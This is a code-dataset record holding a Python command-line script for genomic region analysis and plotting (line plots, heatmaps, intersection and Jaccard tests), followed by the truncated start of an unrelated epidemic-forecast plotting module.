parser_lineplot.add_argument('-pw', metavar=' ', type=int, default=3,
help='Define the width of single panel. (default: %(default)s)')
parser_lineplot.add_argument('-ph', metavar=' ', type=int, default=3,
help='Define the height of single panel. (default: %(default)s)')
parser_lineplot.add_argument('-test', action="store_true",
help="Sample only the first 10 regions in all BED files for testing. (default: %(default)s)")
parser_lineplot.add_argument('-mp', metavar=' ', type=int, default=0,
help="Perform multiprocessing for faster computation. (default: %(default)s)")
parser_lineplot.add_argument('-df', action="store_true",
help="Show the difference of the two signals which share the same labels.The result is the subtraction of the first to the second. (default: %(default)s)")
parser_lineplot.add_argument('-dft', metavar=' ', default=None,
help="Add one more tag for calculating difference. (default: %(default)s)")
parser_lineplot.add_argument('-show', action="store_true",
help='Show the figure in the screen. (default: %(default)s)')
parser_lineplot.add_argument('-table', action="store_true",
help='Store the tables of the figure in text format. (default: %(default)s)')
parser_lineplot.add_argument('-sense', action="store_true",
help='Set the plot sense-specific. (default: %(default)s)')
parser_lineplot.add_argument('-strand', action="store_true",
help='Set the plot strand-specific. (default: %(default)s)')
parser_lineplot.add_argument('-average', action="store_true",
help='Show only the average of the replicates. (default: %(default)s)')
parser_lineplot.add_argument('-flip_negative', action="store_true", default=False,
help='Flip the negative strand (default: %(default)s)')
parser_lineplot.add_argument('-extend_outside', action="store_true", default=False,
help='Extend the window outside of the given regions and compress the given region into fixed internal. (default: %(default)s)')
parser_lineplot.add_argument('-add_region_number', action="store_true", default=False,
help="Add the number of regions in the axis label. (default: %(default)s)")
################### Heatmap ##########################################
parser_heatmap = subparsers.add_parser('heatmap', help='Generate heatmap with various modes.')
choice_center = ['midpoint', 'bothends', 'upstream', 'downstream']
# Be consist as the arguments of GenomicRegionSet.relocate_regions
parser_heatmap.add_argument('input', help=helpinput)
parser_heatmap.add_argument('-o', metavar=' ', help=helpoutput)
parser_heatmap.add_argument('-ga', action="store_true",
help="Use genetic annotation data as input regions (e.g. TSS, TTS, exons and introns) instead of the BED files in the input matrix. (default: %(default)s)")
parser_heatmap.add_argument('-t', metavar=' ', default='heatmap', help=helptitle)
parser_heatmap.add_argument('-center', metavar=' ', choices=choice_center, default='midpoint',
help='Define the center to calculate coverage on the regions. Options are: ' + ', '.join(
choice_center) +
'.(Default:midpoint) The bothend mode will flap the right end region for calculation. (default: %(default)s)')
parser_heatmap.add_argument('-sort', metavar=' ', type=int, default=None,
help='Define the way to sort the signals.' +
'Default is no sorting at all, the signals arrange in the order of their position; ' +
'"0" is sorting by the average ranking of all signals; ' +
'"1" is sorting by the ranking of 1st column; "2" is 2nd and so on... (default: %(default)s)')
parser_heatmap.add_argument('-col', metavar=' ', default='regions', help=helpcol)
parser_heatmap.add_argument('-c', metavar=' ', default='reads', help=helpcolor)
parser_heatmap.add_argument('-row', metavar=' ', default='None', help=helprow)
parser_heatmap.add_argument('-e', metavar=' ', type=int, default=2000,
help='Define the extend length of interested region for plotting. (default: %(default)s)')
parser_heatmap.add_argument('-rs', metavar=' ', type=int, default=200,
help='Define the readsize for calculating coverage. (default: %(default)s)')
parser_heatmap.add_argument('-ss', metavar=' ', type=int, default=50,
help='Define the stepsize for calculating coverage. (default: %(default)s)')
parser_heatmap.add_argument('-bs', metavar=' ', type=int, default=100,
help='Define the binsize for calculating coverage. (default: %(default)s)')
parser_heatmap.add_argument('-organism', metavar=' ', default='hg19',
help='Define the organism. (default: %(default)s)')
parser_heatmap.add_argument('-color', action="store_true", help=help_define_color)
parser_heatmap.add_argument('-log', action="store_true", help='Set colorbar in log scale. (default: %(default)s)')
parser_heatmap.add_argument('-mp', action="store_true",
help="Perform multiprocessing for faster computation. (default: %(default)s)")
parser_heatmap.add_argument('-show', action="store_true",
help='Show the figure in the screen. (default: %(default)s)')
parser_heatmap.add_argument('-table', action="store_true",
help='Store the tables of the figure in text format. (default: %(default)s)')
################### Venn Diagram ########################################
parser_venn = subparsers.add_parser('venn', help='Generate Venn Diagram with peaks of gene list.')
parser_venn.add_argument('-s1', metavar=' ', default=None,
help="Define the file for gene set 1 (BED or gene list)")
parser_venn.add_argument('-s2', metavar=' ', default=None,
help="Define the file for gene set 2 (BED or gene list)")
parser_venn.add_argument('-s3', metavar=' ', default=None,
help="Define the file for gene set 3 (BED or gene list)")
parser_venn.add_argument('-s4', metavar=' ', default=None,
help="Define the file for gene set 3 (BED or gene list)")
parser_venn.add_argument('-l1', metavar=' ', default=None, help="Define label on venn diagram for set 1")
parser_venn.add_argument('-l2', metavar=' ', default=None, help="Define label on venn diagram for set 2")
parser_venn.add_argument('-l3', metavar=' ', default=None, help="Define label on venn diagram for set 3")
parser_venn.add_argument('-l4', metavar=' ', default=None, help="Define label on venn diagram for set 4")
parser_venn.add_argument('-o', metavar=' ', help=helpoutput)
parser_venn.add_argument('-t', metavar=' ', default='venn_diagram', help=helptitle)
parser_venn.add_argument('-organism', metavar=' ', help='Define the organism. ')
################### Integration ##########################################
parser_integration = subparsers.add_parser('integration',
help='Provides some tools to deal with experimental matrix or other purposes.')
parser_integration.add_argument('-ihtml', action="store_true",
help='Integrate all the html files within the given directory and generate index.html for all plots.')
parser_integration.add_argument('-l2m', help='Convert a given file list in txt format into a experimental matrix.')
parser_integration.add_argument('-o', help='Define the folder of the output file.')
################### Parsing the arguments ################################
# print(sys.argv)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(0)
elif len(sys.argv) == 2:
if sys.argv[1] == "-h" or sys.argv[1] == "--help":
parser.print_help()
sys.exit(0)
elif sys.argv[1] == "-v" or sys.argv[1] == "--version":
print(version_message)
sys.exit(0)
else:
# retrieve subparsers from parser
subparsers_actions = [action for action in parser._actions if
isinstance(action, argparse._SubParsersAction)]
# there will probably only be one subparser_action,but better save than sorry
for subparsers_action in subparsers_actions:
# get all subparsers and print help
for choice, subparser in subparsers_action.choices.items():
if choice == sys.argv[1]:
print("\nYou need more arguments.")
print("\nSubparser '{}'".format(choice))
subparser.print_help()
sys.exit(1)
else:
args = parser.parse_args()
if args.mode != 'integration':
if not args.o:
print("** Error: Please define the output directory (-o).")
sys.exit(1)
t0 = time.time()
# Normalised output path
args.o = os.path.normpath(os.path.join(current_dir, args.o))
check_dir(args.o)
check_dir(os.path.join(args.o, args.t))
# Input parameters dictionary
parameter = ["Time: " + datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
"User: " + getpass.getuser(),
"\nCommand:\n\t$ " + " ".join(sys.argv)]
#################################################################################################
##### Main #####################################################################################
#################################################################################################
if args.mode == 'bed_profile':
################### BED profile ##########################################
print2(parameter, "\n############# BED profile #############")
print2(parameter, "\tInput path:\t" + args.i)
print2(parameter, "\tOutput path:\t" + os.path.join(args.o, args.t))
if not args.organism:
print("Please define organism...")
sys.exit(1)
else:
print2(parameter, "\tOrganism:\t" + args.organism)
if args.labels:
args.labels = args.labels.split(",")
args.sources = args.sources.split(",")
if not args.sources:
print("Please define the sources files corresponding to the the labels.")
sys.exit(1)
elif len(args.labels) != len(args.sources):
print("The number of labels doesn't match the number of sources.")
sys.exit(1)
if args.strand:
strands = []
for i, bss in enumerate(args.strand.split(",")):
if bss == "T":
strands.append(True)
args.labels[i] += "(strand-specific)"
elif bss == "F":
strands.append(False)
args.strand = strands
else:
args.strand = [True for i in args.labels]
if args.other:
others = []
for i, bss in enumerate(args.other.split(",")):
if bss == "T":
others.append(True)
elif bss == "F":
others.append(False)
args.other = others
else:
args.other = [True for i in args.labels]
bed_profile = BedProfile(args.i, args.organism, args)
bed_profile.cal_statistics()
bed_profile.plot_distribution_length()
bed_profile.plot_motif_composition()
if args.biotype:
bed_profile.plot_ref(ref_dir=args.biotype, tag="Biotype", other=True, strand=True, background=True)
if args.repeats:
bed_profile.plot_ref(ref_dir=args.repeats, tag="Repeats", other=True, background=True)
if args.genposi:
bed_profile.plot_ref(ref_dir=args.genposi, tag="Genetic position", other=False, strand=False)
if args.labels:
for i, label in enumerate(args.labels):
bed_profile.plot_ref(ref_dir=args.sources[i], tag=label, other=args.other[i], strand=args.strand[i], background=True)
bed_profile.write_tables(args.o, args.t)
bed_profile.save_fig(filename=os.path.join(args.o, args.t, "figure_" + args.t))
bed_profile.gen_html(args.o, args.t)
################### Projection test ##########################################
elif args.mode == 'projection':
# Fetching reference and query EM
print2(parameter, "\n############# Projection Test #############")
print2(parameter, "\tReference: " + args.r)
print2(parameter, "\tQuery: " + args.q)
print2(parameter, "\tOutput directory: " + os.path.basename(args.o))
print2(parameter, "\tExperiment title: " + args.t)
projection = Projection(args.r, args.q, load_bed=args.load)
projection.group_refque(args.g)
projection.colors(args.c, args.color)
if args.bg:
print2(parameter, "\tBackground: " + args.bg)
projection.set_background(bed_path=args.bg)
if args.union:
projection.ref_union()
projection.projection_test(organism=args.organism)
print2(parameter, "\tTaking union of references as the background. ")
else:
projection.projection_test(organism=args.organism)
# generate pdf
projection.plot(args.log, args.pw, args.ph)
output(f=projection.fig, directory=args.o, folder=args.t, filename="projection_test",
extra=matplotlib.pyplot.gci(), pdf=True, show=args.show)
if args.bed:
print2(parameter,
"\tOutput BED files: " + "/".join(os.path.join(args.o, args.t, "bed").split("/")[-3:]))
projection.output_interq(directory=os.path.join(args.o, args.t, "bed"))
# generate html
projection.gen_html(args.o, args.t, args=args)
if args.table:
projection.table(directory=args.o, folder=args.t)
print("\nAll related files are saved in: " + os.path.join(os.path.basename(args.o), args.t))
t1 = time.time()
print2(parameter, "\nTotal running time is : " + str(datetime.timedelta(seconds=round(t1 - t0))))
output_parameters(parameter, directory=args.o, folder=args.t, filename="parameters.txt")
copy_em(em=args.r, directory=args.o, folder=args.t, filename="reference_experimental_matrix.txt")
copy_em(em=args.q, directory=args.o, folder=args.t, filename="query_experimental_matrix.txt")
list_all_index(path=args.o)
###########################################################################
################### Intersect Test ##########################################
if args.mode == 'intersect':
print2(parameter, "\n############ Intersection Test ############")
print2(parameter, "\tReference: " + args.r)
print2(parameter, "\tQuery: " + args.q)
print2(parameter, "\tOutput directory: " + os.path.basename(args.o))
print2(parameter, "\tExperiment title: " + args.t)
# Fetching reference and query EM
inter = Intersect(args.r, args.q, mode_count=args.m, organism=args.organism)
# Grouping
inter.group_refque(args.g)
# Setting background
inter.background(args.bg)
# Extension
if args.ex == 0:
pass
elif args.ex > 0:
inter.extend_ref(args.ex)
elif args.ex < 0:
print("\n**** extension percentage(-ex) should be positive value, not negative.\n")
sys.exit(1)
inter.colors(args.c, args.color)
print("\tProcessing data.", end="")
sys.stdout.flush()
inter.count_intersect(threshold=args.tc)
# generate pdf
print("\n\tGenerate graphics...")
inter.barplot(logt=args.log)
output(f=inter.bar, directory=args.o, folder=args.t, filename="intersection_bar",
extra=matplotlib.pyplot.gci(), pdf=True, show=args.show)
inter.stackedbar()
output(f=inter.sbar, directory=args.o, folder=args.t, filename="intersection_stackedbar",
extra=matplotlib.pyplot.gci(), pdf=True, show=args.show)
inter.barplot(logt=args.log, percentage=True)
output(f=inter.bar, directory=args.o, folder=args.t, filename="intersection_barp",
extra=matplotlib.pyplot.gci(), pdf=True, show=args.show)
if args.stest > 0:
print("\tStatistical testing by randomizing the regions...")
inter.stest(repeat=args.stest, threshold=args.tc, mp=args.mp)
# generate html
inter.gen_html(directory=args.o, title=args.t, align=50, args=args)
t1 = time.time()
print2(parameter, "\nAll related files are saved in: " + os.path.join(os.path.basename(args.o), args.t))
print2(parameter, "\nTotal running time is : " + str(datetime.timedelta(seconds=round(t1 - t0))))
output_parameters(parameter, directory=args.o, folder=args.t, filename="parameters.txt")
copy_em(em=args.r, directory=args.o, folder=args.t, filename="reference_experimental_matrix.txt")
copy_em(em=args.q, directory=args.o, folder=args.t, filename="query_experimental_matrix.txt")
list_all_index(path=args.o)
###########################################################################
################### Jaccard test ##########################################
if args.mode == "jaccard":
"""Return the jaccard test of every possible comparisons between two ExperimentalMatrix.
Method:
The distribution of random jaccard index is calculated by randomizing query for given times.
Then, we compare the real jaccard index to the distribution and formulate p-value as
p-value = (# random jaccard > real jaccard)/(# random jaccard)
"""
print("\n############## Jaccard Test ###############")
jaccard = Jaccard(args.r, args.q)
jaccard.group_refque(args.g)
jaccard.colors(args.c, args.color)
# jaccard test
jaccard.jaccard_test(args.rt, args.organism)
parameter = parameter + jaccard.parameter
t1 = time.time()
# ploting and generate pdf
jaccard.plot(logT=args.nlog)
for i, f in enumerate(jaccard.fig):
output(f=f, directory=args.o, folder=args.t, filename="jaccard_test" + str(i + 1),
extra=matplotlib.pyplot.gci(), pdf=True, show=args.show)
# generate html
jaccard.gen_html(args.o, args.t)
if args.table:
jaccard.table(directory=args.o, folder=args.t)
print("\nAll related files are saved in: " + os.path.join(dir, args.o, args.t))
print2(parameter, "\nTotal running time is : " + str(datetime.timedelta(seconds=round(t1 - t0))))
output_parameters(parameter, directory=args.o, folder=args.t, filename="parameters.txt")
copy_em(em=args.r, directory=args.o, folder=args.t, filename="Reference_experimental_matrix.txt")
copy_em(em=args.q, directory=args.o, folder=args.t, filename="Query_experimental_matrix.txt")
list_all_index(path=args.o)
###########################################################################
################### Combinatorial Test ##########################################
if args.mode == 'combinatorial':
print("\n############ Combinatorial Test ############")
# Fetching reference and query EM
# comb = Combinatorial(args.r,args.q, mode_count=args.m, organism=args.organism)
inter = Intersect(args.r, args.q, mode_count=args.m, organism=args.organism)
# Setting background
inter.background(args.bg)
# Grouping
inter.group_refque(args.g)
# Extension
if args.ex == 0:
pass
elif args.ex > 0:
inter.extend_ref(args.ex)
elif args.ex < 0:
print("\n**** extension percentage(-ex) should be positive value, not negative.\n")
sys.exit(1)
# Combinatorial
print2(parameter, "Generating all combinatorial regions for further analysis...")
inter.combinatorial()
inter.count_intersect(threshold=args.tc, frequency=True)
# generate pdf
inter.colors_comb()
# inter.barplot(args.log)
# output(f=inter.bar, directory = args.output, folder = args.title, filename="intersection_bar",extra=matplotlib.pyplot.gci(),pdf=True,show=args.show)
# if args.stackedbar:
# inter.colors(args.c, args.color,ref_que = "ref")
inter.comb_stacked_plot()
output(f=inter.sbar, directory=args.o, folder=args.t, filename="intersection_stackedbar",
extra=matplotlib.pyplot.gci(), pdf=True, show=args.show)
if args.venn:
inter.comb_venn(directory=os.path.join(args.o, args.t))
# if args.lineplot:
# inter.comb_lineplot()
if args.stest > 0:
inter.stest(repeat=args.stest, threshold=args.tc, mp=args.mp)
# generate html
inter.gen_html_comb(directory=args.o, title=args.t, align=50, args=args)
# parameter = parameter + inter.parameter
t1 = time.time()
print("\nAll related files are saved in: " + os.path.join(current_dir, args.o, args.t))
print2(parameter, "\nTotal running time is : " + str(datetime.timedelta(seconds=round(t1 - t0))))
output_parameters(parameter, directory=args.o, folder=args.t, filename="parameters.txt")
copy_em(em=args.r, directory=args.o, folder=args.t, filename="Reference_experimental_matrix.txt")
copy_em(em=args.q, directory=args.o, folder=args.t, filename="Query_experimental_matrix.txt")
# list_all_index(path=args.o)
###########################################################################
################### Boxplot ##########################################
if args.mode == 'boxplot':
print("\n################# Boxplot #################")
boxplot = Boxplot(args.input, fields=[args.g, args.s, args.c], title=args.t, df=args.df)
print2(parameter, "\nStep 1/5: Combining all regions")
boxplot.combine_allregions()
print2(parameter, " " + str(len(boxplot.all_bed)) + " regions from all bed files are combined.")
t1 = time.time()
print2(parameter, " --- finished in {0} secs\n".format(round(t1 - t0)))
# Coverage of reads on all_bed
print2(parameter, "Step 2/5: Calculating coverage of each bam file on all regions")
boxplot.bedCoverage()
t2 = time.time()
print2(parameter, " --- finished in {0} (H:M:S)\n".format(datetime.timedelta(seconds=round(t2 - t1))))
# Quantile normalization
print2(parameter, "Step 3/5: Quantile normalization of all coverage table")
if args.nqn:
print2(parameter, " No quantile normalization.")
boxplot.norm_table = boxplot.all_table
else:
boxplot.quantile_normalization()
t3 = time.time()
print2(parameter, " --- finished in {0} secs\n".format(round(t3 - t2)))
# Generate individual table for each bed
print2(parameter, "Step 4/5: Constructing different tables for box plot")
boxplot.tables_for_plot()
# if args.table: boxplot.print_plot_table(directory = args.o, folder = args.t)
t4 = time.time()
print2(parameter, " --- finished in {0} secs\n".format(round(t4 - t3)))
# Plotting
print2(parameter, "Step 5/5: Plotting")
boxplot.group_tags(groupby=args.g, sortby=args.s, colorby=args.c)
boxplot.group_data(directory=args.o, folder=args.t, log=args.nlog)
boxplot.color_map(colorby=args.c, definedinEM=args.color)
boxplot.plot(title=args.t, logT=args.nlog, scol=args.scol, ylim=args.ylim, pw=args.pw, ph=args.ph)
if args.table:
boxplot.print_plot_table(directory=args.o, folder=args.t)
output(f=boxplot.fig, directory=args.o, folder=args.t, filename="boxplot", extra=matplotlib.pyplot.gci(),
pdf=True,
show=args.show)
# HTML
boxplot.gen_html(args.o, args.t, align=50)
t5 = time.time()
print2(parameter, " --- finished in {0} secs\n".format(round(t5 - t4)))
print2(parameter,
"Total running time is: " + str(datetime.timedelta(seconds=round(t5 - t0))) + " (H:M:S)\n")
print("\nAll related files are saved in: " + os.path.join(current_dir, args.o, args.t))
output_parameters(parameter, directory=args.o, folder=args.t, filename="parameters.txt")
copy_em(em=args.input, directory=args.o, folder=args.t)
list_all_index(path=args.o)
################### Lineplot #########################################
if args.mode == 'lineplot':
if args.scol and args.srow:
print("** Err: -scol and -srow cannot be used simutaneously.")
sys.exit(1)
print("\n################ Lineplot #################")
# Read experimental matrix
t0 = time.time()
if "reads" not in (args.g, args.col, args.c, args.row):
print("Please add 'reads' tag as one of grouping, sorting, or coloring argument.")
sys.exit(1)
# if "regions" not in (args.col, args.c, args.row):
# print("Please add 'regions' tag as one of grouping, sorting, or coloring argument.")
# sys.exit(1)
if not os.path.isfile(args.input):
print("Please check the input experimental matrix again. The given path is wrong.")
sys.exit(1)
print2(parameter, "Parameters:\tExtend length:\t" + str(args.e))
print2(parameter, "\t\tRead size:\t" + str(args.rs))
print2(parameter, "\t\tBin size:\t" + str(args.bs))
print2(parameter, "\t\tStep size:\t" + str(args.ss))
print2(parameter, "\t\tCenter mode:\t" + str(args.center + "\n"))
lineplot = Lineplot(em_path=args.input, title=args.t, annotation=args.ga,
organism=args.organism, center=args.center, extend=args.e, rs=args.rs,
bs=args.bs, ss=args.ss, df=args.df, dft=args.dft,
fields=[args.g, args.col, args.row, args.c],
test=args.test, sense=args.sense, strand=args.strand, flipnegative=args.flip_negative,
outside=args.extend_outside, add_number=args.add_region_number)
# Processing the regions by given parameters
print2(parameter, "Step 1/3: Processing regions by given parameters")
lineplot.relocate_bed()
t1 = time.time()
print2(parameter, "\t--- finished in {0} secs".format(str(round(t1 - t0))))
if args.mp > 0:
print2(parameter,
"\nStep 2/3: Calculating the coverage to all reads and averaging with multiprocessing ")
else:
print2(parameter, "\nStep 2/3: Calculating the coverage to all reads and averaging")
lineplot.group_tags(groupby=args.g, rowby=args.row, columnby=args.col, colorby=args.c)
lineplot.gen_cues()
lineplot.coverage(sortby=args.row, mp=args.mp, log=args.log, average=args.average)
t2 = time.time()
print2(parameter, "\t--- finished in {0} (H:M:S)".format(str(datetime.timedelta(seconds=round(t2 - t1)))))
# Plotting
print2(parameter, "\nStep 3/3: Plotting the lineplots")
lineplot.colormap(colorby=args.c, definedinEM=args.color)
lineplot.plot(output=args.o, printtable=args.table, ylog=args.log,
scol=args.scol, srow=args.srow, w=args.pw, h=args.ph)
for i, f in enumerate(lineplot.fig):
output(f=f, directory=args.o, folder=args.t, filename="lineplot_" + lineplot.group_tags[i],
extra=matplotlib.pyplot.gci(), pdf=True, show=args.show)
lineplot.gen_html(args.o, args.t)
t3 = time.time()
print2(parameter, "\t--- finished in {0} secs".format(str(round(t3 - t2))))
print2(parameter,
"\nTotal running time is : " + str(datetime.timedelta(seconds=round(t3 - t0))) + "(H:M:S)\n")
print("\nAll related files are saved in: " + os.path.join(dir, args.o, args.t))
output_parameters(parameter, directory=args.o, folder=args.t, filename="parameters.txt")
copy_em(em=args.input, directory=args.o, folder=args.t)
list_all_index(path=args.o)
################### Heatmap ##########################################
if args.mode == 'heatmap':
print("\n################# Heatmap #################")
# Most part of heat map are the same as lineplot, so it share the same class as lineplot
# Read experimental matrix
t0 = time.time()
if "reads" not in (args.g, args.col, args.c, args.row):
print("Please add 'reads' tag as one of grouping, sorting, or coloring argument.")
sys.exit(1)
# if "regions" not in (args.g, args.col, args.c, args.row):
# print("Please add 'regions' tag as one of grouping, sorting, or coloring argument.")
# sys.exit(1)
print2(parameter, "Parameters:\tExtend length:\t" + str(args.e))
print2(parameter, "\t\tRead size:\t" + str(args.rs))
print2(parameter, "\t\tBin size:\t" + str(args.bs))
print2(parameter, "\t\tStep size:\t" + str(args.ss))
print2(parameter, "\t\tCenter mode:\t" + str(args.center + "\n"))
lineplot = Lineplot(em_path=args.input, title=args.t, annotation=args.ga,
organism=args.organism, center=args.center, extend=args.e, rs=args.rs,
bs=args.bs, ss=args.ss, df=False, fields=[args.col, args.row, args.c],
dft=args.dft, flipnegative=False, sense=False, strand=False, test=False)
# Processing the regions by given parameters
print2(parameter, "Step 1/4: Processing regions by given parameters")
lineplot.relocate_bed()
t1 = time.time()
print2(parameter, " --- finished in {0} secs".format(str(round(t1 - t0))))
if args.mp:
print2(parameter,
"\nStep 2/4: Calculating the coverage to all reads and averaging with multiprocessing ")
else:
print2(parameter, "\nStep 2/4: Calculating the coverage to all reads and averaging")
lineplot.group_tags(groupby=args.col, sortby=args.row, colorby=args.c)
lineplot.gen_cues()
lineplot.coverage(sortby=args.s, heatmap=True, logt=args.log, mp=args.mp)
t2 = time.time()
print2(parameter, " --- finished in {0} (h:m:s)".format(str(datetime.timedelta(seconds=round(t2 - t1)))))
# Sorting
print2(parameter, "\nStep 3/4: Sorting the data for heatmap")
lineplot.hmsort(sort=args.sort)
t3 = time.time()
print2(parameter, " --- finished in {0} (h:m:s)".format(str(datetime.timedelta(seconds=round(t3 - t2)))))
# Plotting
print2(parameter, "\nStep 4/4: Plotting the heatmap")
lineplot.hmcmlist(colorby=args.c, definedinEM=args.color)
lineplot.heatmap(args.log)
for i, name in enumerate(lineplot.hmfiles):
output(f=lineplot.figs[i], directory=args.o, folder=args.t, filename=name, pdf=True, show=args.show)
lineplot.gen_htmlhm(args.o, args.t)
t4 = time.time()
print2(parameter, " --- finished in {0} secs".format(str(round(t4 - t3))))
print2(parameter,
"\nTotal running time is : " + str(datetime.timedelta(seconds=round(t4 - t0))) + "(H:M:S)\n")
print("\nAll related files are saved in: " + os.path.join(current_dir, args.o, args.t))
output_parameters(parameter, directory=args.o, folder=args.t, filename="parameters.txt")
copy_em(em=args.input, directory=args.o, folder=args.t)
list_all_index(path=args.o)
################### Venn Diagram ##########################################
if args.mode == 'venn':
print("\n################# Venn Diagram ###############")
if not os.path.exists(os.path.join(args.o, args.t)):
os.makedirs(os.path.join(args.o, args.t))
sets = [s for s in [args.s1, args.s2, args.s3, args.s4] if s]
venn = Venn(sets=sets, organism=args.organism)
f = venn.venn_diagram(directory=args.o, title=args.t, labels=[args.l1, args.l2, args.l3, args.l4])
output(f=f, directory=args.o, folder=args.t, filename="venn", pdf=True)
################### Integration ##########################################
if args.mode == 'integration':
print("\n################# Integration ###############")
if args.ihtml:
list_all_index(path=args.o)
| 66.764972 | 263 | 0.581803 | 6,795 | 59,087 | 4.966004 | 0.091685 | 0.053461 | 0.043119 | 0.047297 | 0.656176 | 0.62989 | 0.58849 | 0.519115 | 0.476944 | 0.452495 | 0 | 0.007264 | 0.261462 | 59,087 | 884 | 264 | 66.840498 | 0.766007 | 0.037995 | 0 | 0.309353 | 0 | 0.051799 | 0.318442 | 0.00543 | 0.002878 | 0 | 0 | 0 | 0 | 1 | 0.001439 | false | 0.005755 | 0.025899 | 0 | 0.027338 | 0.143885 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4180dd4796db00aa27180113a9c270adce7f7aee | 8,390 | py | Python | viz/uncertainty.py | WadhwaniAI/covid-modelling | db9f89bfbec392ad4de6b4583cfab7c3d823c1c9 | [
"MIT"
] | 3 | 2021-06-23T10:27:11.000Z | 2022-02-09T07:50:42.000Z | viz/uncertainty.py | WadhwaniAI/covid-modelling | db9f89bfbec392ad4de6b4583cfab7c3d823c1c9 | [
"MIT"
] | 3 | 2021-06-23T09:36:29.000Z | 2022-01-13T03:38:16.000Z | viz/uncertainty.py | WadhwaniAI/covid-modelling | db9f89bfbec392ad4de6b4583cfab7c3d823c1c9 | [
"MIT"
] | null | null | null | import datetime
from copy import copy
from datetime import timedelta
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
from adjustText import adjust_text
from matplotlib.lines import Line2D
from matplotlib.patches import Patch
from utils.generic.enums import Columns
from viz.utils import axis_formatter
def plot_ptiles(predictions_dict, vline=None, which_compartments=[Columns.active],
plot_individual_curves=True, log_scale=False, truncate_series=True,
left_truncation_buffer=30, ci_lb=2.5, ci_ub=97.5):
predictions = copy(predictions_dict['forecasts'])
try:
del predictions['best']
except:
pass
df_master = list(predictions.values())[0]
for df in list(predictions.values())[1:]:
if isinstance(df, pd.DataFrame):
df = df.reset_index()
else:
df = df['df_prediction']
df_master = pd.concat([df_master, df], ignore_index=True)
train_period = predictions_dict['run_params']['split']['train_period']
val_period = predictions_dict['run_params']['split']['val_period']
val_period = 0 if val_period is None else val_period
df_true = predictions_dict['df_district']
if truncate_series:
df_true = df_true[df_true['date'] >
(list(predictions.values())[0]['date'].iloc[0] -
timedelta(days=left_truncation_buffer))]
df_true.reset_index(drop=True, inplace=True)
plots = {}
for compartment in which_compartments:
fig, ax = plt.subplots(figsize=(12, 12))
texts = []
ax.plot(df_true[Columns.date.name].to_numpy(), df_true[compartment.name].to_numpy(),
'-o', color='C0', label=f'{compartment.label} (Observed)')
if plot_individual_curves:
for _, (ptile, df_prediction) in enumerate(predictions.items()):
sns.lineplot(x=Columns.date.name, y=compartment.name, data=df_prediction,
ls='-', label=f'{compartment.label} Percentile :{ptile}')
texts.append(plt.text(
x=df_prediction[Columns.date.name].iloc[-1],
y=df_prediction[compartment.name].iloc[-1], s=ptile))
else:
ax.plot(df_master[Columns.date.name], df_master[compartment.name],
ls='-', label=f'{compartment.label}')
ax.fill_between(predictions[ci_lb][Columns.date.name], predictions[ci_lb][compartment.name],
predictions[ci_ub][compartment.name], ls='-', label=f'{compartment.label}')
if vline:
plt.axvline(datetime.datetime.strptime(vline, '%Y-%m-%d'))
ax.axvline(x=list(predictions.values())[0].iloc[0, :]['date'],
ls=':', color='brown', label='Train starts')
ax.axvline(x=list(predictions.values())[0].iloc[train_period+val_period-1, :]['date'],
ls=':', color='black', label='Data Last Date')
ax.set_xlim(ax.get_xlim()[0], ax.get_xlim()[1] + 10)
adjust_text(texts, arrowprops=dict(arrowstyle="->", color='r', lw=0.5))
axis_formatter(ax, log_scale=log_scale)
fig.suptitle('Forecast of all deciles for {} '.format(compartment.name), fontsize=16)
plots[compartment] = fig
return plots
def plot_ptiles_reichlab(df_comb, model, location, target='inc death', plot_true=False, plot_point=True,
plot_individual_curves=True, ci_lb=2.5, ci_ub=97.5, color='C0', ax=None, ):
compartment = 'deceased' if 'death' in target else 'total'
mode = 'inc' if 'inc' in target else 'cum'
compartment = Columns.from_name(compartment)
df_plot = copy(df_comb.loc[(df_comb['model'] == model) & (
df_comb['location'] == location), :])
df_plot = df_plot[[target in x for x in df_plot['target']]]
if ax is None:
fig, ax = plt.subplots(figsize=(12, 12))
else:
fig = None
if plot_true:
df_true = df_plot.groupby('target_end_date').mean().reset_index()
ax.plot(df_true['target_end_date'].to_numpy(), df_true['true_value'].to_numpy(),
'--o', color=compartment.color)
if plot_point:
df_point = df_plot[df_plot['type'] == 'point']
ax.plot(df_point['target_end_date'].to_numpy(), df_point['forecast_value'].to_numpy(),
'-o', color=color)
texts = []
df_quantiles = df_plot[df_plot['type'] == 'quantile']
quantiles = df_quantiles.groupby('quantile').sum().index
if plot_individual_curves:
for _, qtile in enumerate(quantiles):
df_qtile = df_quantiles[df_quantiles['quantile']
== qtile].infer_objects()
label = round(qtile*100) if qtile * \
100 % 1 < 1e-8 else round(qtile*100, 1)
sns.lineplot(x='target_end_date', y='value', data=df_qtile, ls='-')
texts.append(plt.text(
x=df_qtile['target_end_date'].iloc[-1],
y=df_qtile['value'].iloc[-1], s=label))
else:
df_ci_lb = df_quantiles[df_quantiles['quantile']
== ci_lb*0.01].infer_objects()
df_ci_ub = df_quantiles[df_quantiles['quantile']
== ci_ub*0.01].infer_objects()
ax.fill_between(df_ci_ub['target_end_date'], df_ci_lb['forecast_value'],
df_ci_ub['forecast_value'], color=color, alpha=0.1, label=f'{model} 95% CI')
ax.set_xlim(ax.get_xlim()[0], ax.get_xlim()[1] + 10)
adjust_text(texts, arrowprops=dict(arrowstyle="->", color='r', lw=0.5))
axis_formatter(ax)
legend_elements = []
if plot_true:
legend_elements += [
Line2D([0], [0], ls='--', marker='o', color=compartment.color,
label=f'{target.title()} (Observed)')]
if plot_point:
legend_elements += [
Line2D([0], [0], ls='-', marker='o', color=color,
label=f'{model} {target.title()} Point Forecast')]
if plot_individual_curves:
legend_elements += [
Line2D([0], [0], ls='-', color='blue',
label=f'{model} {target.title()} Percentiles'),
]
else:
legend_elements += [
Patch(facecolor=color, edgecolor=color, alpha=0.1,
label=f'{model} {target.title()} 95% CI'),
]
ax.legend(handles=legend_elements)
ax.set_title('Forecast for {}, {}, {} {}'.format(model, location,
mode.title(), compartment.label), fontsize=16)
return fig, ax
def plot_beta_loss(dict_of_trials):
fig, ax = plt.subplots(figsize=(12, 8))
